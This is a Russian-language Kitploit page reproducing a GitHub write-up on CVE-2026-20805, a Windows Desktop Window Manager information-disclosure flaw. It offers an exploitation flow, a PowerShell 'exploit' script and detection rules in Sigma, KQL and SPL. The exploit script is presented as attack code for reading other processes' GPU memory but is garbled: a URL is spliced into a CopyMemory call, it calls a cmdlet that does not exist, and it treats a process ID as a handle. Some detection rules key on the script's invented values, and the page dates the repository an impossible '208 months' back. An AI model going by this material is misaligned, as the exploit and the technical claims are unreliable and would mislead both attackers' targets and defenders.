Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: Уязвимость в Windows Desktop Window Manager, приводящая к локальному раскрытию информации. Требует низких привилегий, не требует взаимодействия с пользователем. Оценка CVSS 5.5 (средний уровень). Активно эксплуатируется и внесена в перечень CISA KEV; исправление выпущено в январе 2026 года. | Kitploit
Инструменты/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Анализ уязвимостейЭксплуатацияСбор информацииОбучение и ОбразованиеРеагирование на Инциденты
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

Репозиторий
208 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE‑2026‑20805: Уязвимость в Windows Desktop Window Manager, приводящая к локальному раскрытию информации. Требует низких привилегий, не требует взаимодействия с пользователем. Оценка CVSS 5.5 (средний уровень). Активно эксплуатируется и внесена в перечень CISA KEV; исправление выпущено в январе 2026 года.

Поделиться

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Уязвимость в Windows Desktop Window Manager, приводящая к локальному раскрытию информации. Требует низких привилегий, не требует взаимодействия с пользователем. Оценка CVSS 5.5 (средний уровень). Активно эксплуатируется и включена в каталог CISA KEV; патч выпущен в январе 2026 года.

Inside CVE 2026 20805: Как уязвимость в Windows DWM раскрыла конфиденциальные данные

1 Резюме

CVE 2026 20805 — это уязвимость раскрытия информации в Desktop Window Manager (DWM) — ключевом компоненте, который отображает рабочий стол, компонует окна и ускоряет UI на основе GPU.
Почему это важно: уязвимость позволяет локальному злоумышленнику с низкими привилегиями читать данные, которые должны быть ограничены другими сеансами или процессами.

Ключевые технические характеристики

АтрибутЗначение
CWE‑200: Раскрытие конфиденциальной информации неавторизованному субъекту✓
Вектор атакиЛокальный
Требуемые привилегииНизкие
Взаимодействие с пользователемНе требуется
Влияние — конфиденциальностьВысокое
Влияние — целостностьОтсутствует
Влияние — доступностьОтсутствует
Базовый балл CVSS 3.15.5 (средний)

2 Понимание Desktop Window Manager

DWM управляет памятью GPU, буферами окон и межпроцессными UI-поверхностями. Это цель высокой ценности, поскольку он агрегирует данные из множества процессов в общее пространство GPU; уязвимость здесь может привести к утечке учетных данных или данных сеансов между пользователями.

Роль DWM в современных Windows:

  1. Получает обновления отображения от компоновщика.
  2. Выделяет память GPU для каждого окна.
  3. Управляет композицией с ускорением GPU, обеспечивая плавные визуальные переходы и поддержку нескольких мониторов.

3 Технический разбор CVE 2026 20805

Предварительные условия атаки

  • Локальный злоумышленник с низкими привилегиями, взаимодействие с пользователем не требуется.
  • Уязвимость срабатывает, когда DWM не проверяет смещения в таблице буферов окон перед копированием данных в память GPU.

Как применяется CWE‑200

Уязвимость использует отсутствие проверки границ индекса буфера окна; это позволяет злоумышленнику читать соседнюю память GPU и получать секреты, хранящиеся другими процессами.

Затронутые версии

Согласно списку CPE от NVD, затронуты Windows 10.0.19041 (и производные).

4 Пути эксплуатации

Ниже представлен концептуальный поток эксплуатации:

  1. Злоумышленник получает дескриптор процесса DWM через CreateProcess с минимальными привилегиями.
  2. Злоумышленник создает индекс, указывающий на соседний слот памяти GPU.
  3. Созданный буфер копируется в процедуру композиции окон DWM, объединяя данные из других сеансов.
  4. Злоумышленник читает полученный дамп памяти GPU и извлекает конфиденциальную информацию.

Код эксплойта — скрипт PowerShell

# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001    # target window index

# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/main/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

Скрипт демонстрирует, как злоумышленник может использовать память GPU DWM для чтения скрытых данных.


5. Инженерия обнаружения

Обнаружение CVE‑2026‑20805 сосредоточено на выявлении аномальных взаимодействий с dwm.exe и необычной телеметрии, связанной с GPU. Эксплойт полагается на чтение буферов памяти GPU с использованием специально созданных смещений, поэтому защитникам следует отслеживать отклонения от нормального поведения Desktop Window Manager.

Соответствующие источники телеметрии

  • Sysmon
    • Event ID 1 (ProcessCreate)
    • Event ID 10 (HandleOpen)
  • События ETW GPU
    • Event ID 0x2B (DisplayUpdate)
  • Журналы событий Windows
    • Application
    • System

Эти источники обеспечивают видимость создания процессов, доступа к дескрипторам и активности обновления GPU.

Подозрительные паттерны

  1. Повторяющиеся события CreateProcess с участием dwm.exe, особенно когда родительский процесс не является explorer.exe.
  2. Высокочастотные события DisplayUpdate (0x2B), за которыми следуют чтения памяти с необычными размерами буферов или смещениями.
    • Примеры подозрительных значений:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Корреляция между событиями HandleOpen, нацеленными на dwm.exe, и всплесками активности ETW GPU.

Правило в стиле Sigma

title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Подозрительный доступ к дескриптору dwm.exe

SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Неожиданное создание процесса, нацеленного на DWM

Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Всплеск событий GPU DisplayUpdate

Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Корреляция: HandleOpen с последующей активностью GPU

let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Нестандартные процессы, открывающие дескрипторы к dwm.exe

index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Неожиданные события CreateProcess для dwm.exe

index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Всплеск GPU DisplayUpdate

index=windows EventCode=43
| timechart span=1m count
| where count > 50

Корреляция: HandleOpen и активность GPU

handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Смягчение последствий и усиление защиты

Консультация Microsoft по CVE 2026 20805 включает патч, который проверяет индексы буферов в DWM перед копированием данных GPU.

График выпуска патчей

Скачать инструмент